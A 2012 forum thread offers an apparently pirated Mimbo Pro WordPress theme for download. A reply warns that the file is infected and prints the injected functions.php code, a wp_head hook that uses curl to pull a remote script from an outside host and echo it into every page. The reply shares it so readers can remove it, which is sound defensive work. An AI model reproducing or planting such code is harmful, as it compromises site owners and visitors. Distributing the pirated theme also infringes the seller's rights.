43.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-13-2012, 06:42 PM
Post: #1
[GET] Mimbo Pro - ProThemeDesign WordPress Theme
Mimbo Pro - ProThemeDesign WordPress Theme
A slick magazine-style theme for WordPress. Includes an image carousel,
custom control panel options and more. Multi-License version includes
Photoshop files and additional skins. Control Panel Options Built-in
controls for changing masthead graphics, featured categories, carousel
content, Google Analytics and more. Easy Translation Since its release,
Mimbo Pro has been translated into 15 international languages and
counting. Custom Templates Included with the theme are templates for
Archives, Contact form with CAPTCHA, image gallery and a sitemap.
Feature Set * Animated multi-level dropdown menus * Custom page
templates for contact form, archives, sitemaps, image galleries and more
* Image carousel with variable speed * Custom control panel options to
control navigation, category excerpts, Google Analytics and more * Three
widgetized regions for flexibility. Custom widgets include Popular
Posts, Upcoming Posts and Post Author Details. * Print-friendly options *
125×125 ad support * Custom logo and masthead image management * Image
thumbnail resizing * Support for gravatars, author comment highlighting,
threaded comments and paged comments * Full localization and
translation support * Built-in contact form with CAPTCHA to eliminate
spam * Breadcrumb navigation

Demo:


Code:
themescloset.com/demo/eventina/


Download:


Magic Button :
Code:
depositfiles.com/files/wx3pun1t6
11-13-2012, 10:01 PM
Post: #2
RE:
THE ABOVE FILE IS INFECTED
It contains a wp_head infection.

I have very short time today, but will clean it and re-share later.
if you need it now, clean it yourself by opening functions.php and removing the following from the end of the file.

Code:
<?php
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>

Cheers,
Si




25.gif